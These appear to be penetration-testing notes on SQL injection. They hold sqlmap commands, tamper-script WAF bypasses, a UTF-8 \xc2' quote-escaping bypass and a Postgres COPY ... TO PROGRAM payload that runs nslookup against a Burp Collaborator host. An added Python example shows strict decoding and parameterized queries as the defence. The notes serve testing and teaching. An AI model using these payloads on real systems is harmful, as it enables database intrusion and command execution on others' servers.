SQLi
sqlmap
# request in txt
sqlmap -r search-test.txt -p parameter
# post
sqlmap -o -u "http://example.com/index.php?id=1" --data="username=admin&password=pass&submit=+Login+" --method=POST
# get
sqlmap -u "http://example.com/index.php?id=1"
# with point of injection (*)
sqlmap -u "http://example.com/index.php?id=1*-133&debug=true"
# risk
sqlmap -u "http://example.com/index.php?id=1" --risk=3 --level=5
# extra HTTP headers (name: value pairs, newline-separated)
sqlmap -u "http://example.com/index.php?id=1" --headers="Header-Name: value"
Tamper
Tamper scripts rewrite payloads so that they can bypass a WAF.
Example:
sqlmap -u "http://example.com/index.php?id=1" --tamper="between,randomcase"
Tricks
Some sites append an extra quote character (') to the injected input. This behavior can be bypassed by abusing UTF-8: \xc2 is a lead byte that asks for a follow-up byte, so decoding \xc2' (\xc2\x27) results in a bypass.
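The trick above only works because the server manipulates the raw bytes of the parameter before decoding them. The following added example (not part of the original notes) shows the server-side handling that closes it: decode strictly first, so an orphan lead byte such as \xc2 is rejected instead of being quietly repaired, and bind the value as a query parameter so quotes never reach the SQL text. The handler name, the users table and the sample inputs are constructed for illustration; sqlite3 stands in for the real database.

```python
import sqlite3
from typing import List, Optional

# Constructed sample inputs (not from the original notes).
ORPHAN_LEAD_BYTE_QUOTE = b"\xc2'"      # the \xc2' sequence from the notes
VALID_NON_ASCII = b"\xc2\xa9"          # a well-formed two-byte sequence (the (c) sign)
QUOTED_NAME = b"o'neil"                # a legitimate value containing a quote


def strict_decode(raw: bytes) -> Optional[str]:
    """Decode request bytes as UTF-8 with the strict error handler.

    An incomplete multi-byte sequence (a lead byte followed by a non-continuation
    byte such as ') raises UnicodeDecodeError; we return None so the caller
    rejects the request rather than trying to repair or escape the bytes.
    """
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def make_db() -> sqlite3.Connection:
    """Build an in-memory table with constructed rows for the example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT)")
    conn.executemany(
        "INSERT INTO users (name) VALUES (?)",
        [("alice",), ("bob",), ("o'neil",)],
    )
    return conn


def lookup_user(conn: sqlite3.Connection, raw_name: bytes) -> Optional[List[str]]:
    """Hypothetical request handler: returns matching names, or None if the
    input was rejected as malformed UTF-8.

    The value is passed as a bound parameter, so no quote in it can alter the
    statement; there is nothing for a byte-level escaping trick to confuse.
    """
    name = strict_decode(raw_name)
    if name is None:
        return None
    cur = conn.execute("SELECT name FROM users WHERE name = ?", (name,))
    return [row[0] for row in cur.fetchall()]


if __name__ == "__main__":
    db = make_db()
    print("orphan lead byte ->", lookup_user(db, ORPHAN_LEAD_BYTE_QUOTE))  # None (rejected)
    print("valid non-ascii  ->", lookup_user(db, VALID_NON_ASCII))         # [] (decoded, no match)
    print("quoted name      ->", lookup_user(db, QUOTED_NAME))             # ["o'neil"]
```

Strict decoding is the part that matters for this trick: a permissive decoder that drops or merges bad bytes is exactly what lets the appended quote disappear, while a strict one turns the malformed request into a hard error that can also be logged and alerted on. Legitimate non-ASCII input still decodes normally, as the `\xc2\xa9` case shows.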
Blind
Postgres (COPY ... TO PROGRAM runs a shell command on the database host; it needs superuser or, from PostgreSQL 11, membership in the pg_execute_server_program role)
copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'